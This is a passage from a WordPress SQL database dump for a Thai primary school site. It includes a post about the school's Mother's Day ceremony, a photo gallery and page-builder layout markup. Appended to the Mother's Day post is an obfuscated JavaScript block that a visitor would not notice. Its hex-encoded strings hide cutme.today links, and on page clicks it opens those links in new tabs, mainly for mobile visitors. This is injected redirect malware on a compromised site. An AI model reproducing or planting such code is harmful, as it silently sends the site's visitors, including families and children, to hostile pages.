(807,1,'2024-08-09 21:58:26','2024-08-09 14:58:26','<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 8 สิงหาคม 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ จัดกิจกรรมวันแม่แห่งชาติ เนื่องในวันเฉลิมพระชนมพรรษา สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง เพื่อแสดงความจงรักภักดีแด่องค์สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง และเพื่อให้นักเรียนได้แสดงความเคารพ ความกตัญญูกตเวทีต่อผู้มีพระคุณ โดยกิจกรรมประกอบด้วย คณะครู บุคลากร นักเรียนและผู้ปกครอง โดยพิธีเริ่มจากประธานเปิดกรวยธูปเทียนแพร ถวายพุ่มเงิน พุ่มทอง และเปิดกรวยถวายราชสักการะ ลงนามถวายพระพร ประธานกล่าวถวายราชสดุดีเฉลิมพระเกียรติถวายพระพรชัยมงคล สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง ทุกคนร่วมร้องเพลงสดุดีพระแม่ไทยและ ร้องเพลงสรรเสริญพระบารมี จากนั้นนักเรียนทุกคนแสดงความรักและกตัญญูต่อแม่ ณ ใต้ถุนอาคาร โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":795,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8171-1024x578.jpg\" alt=\"\" class=\"wp-image-795\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":793,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8156-1024x768.jpg\" alt=\"\" class=\"wp-image-793\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":798,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8160-1024x768.jpg\" alt=\"\" class=\"wp-image-798\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":794,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8189-1024x578.jpg\" alt=\"\" class=\"wp-image-794\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":797,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1725_0-1024x683.jpg\" alt=\"\" class=\"wp-image-797\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":796,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1768_0-1024x683.jpg\" alt=\"\" class=\"wp-image-796\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":799,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1825_0-1024x683.jpg\" alt=\"\" class=\"wp-image-799\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":800,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1714_0-1024x683.jpg\" alt=\"\" class=\"wp-image-800\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":801,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1755_0-1024x683.jpg\" alt=\"\" class=\"wp-image-801\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":802,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1759_0-1024x683.jpg\" alt=\"\" class=\"wp-image-802\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":803,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1724_0-1024x683.jpg\" alt=\"\" class=\"wp-image-803\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":804,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1772_0-1024x683.jpg\" alt=\"\" class=\"wp-image-804\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":806,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1840_0-1024x683.jpg\" alt=\"\" class=\"wp-image-806\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":805,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1890_0-1024x683.jpg\" alt=\"\" class=\"wp-image-805\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','12 สิหาคม 2567 กิจกรรมวันแม่แห่งชาติ เนื่องในวันเฉลิมพระชนมพรรษา สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง','','inherit','closed','closed','','792-revision-v1','','','2024-08-09 21:58:26','2024-08-09 14:58:26','',792,'http://pakhaeng.ssk.in.th/?p=807',0,'revision','',0),
(808,1,'2024-08-09 22:03:57','2024-08-09 15:03:57','','คู่มือ','','inherit','','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad','','','2024-08-09 22:03:57','2024-08-09 15:03:57','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png',0,'attachment','image/png',0),
(809,1,'2024-08-09 22:04:14','2024-08-09 15:04:14','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 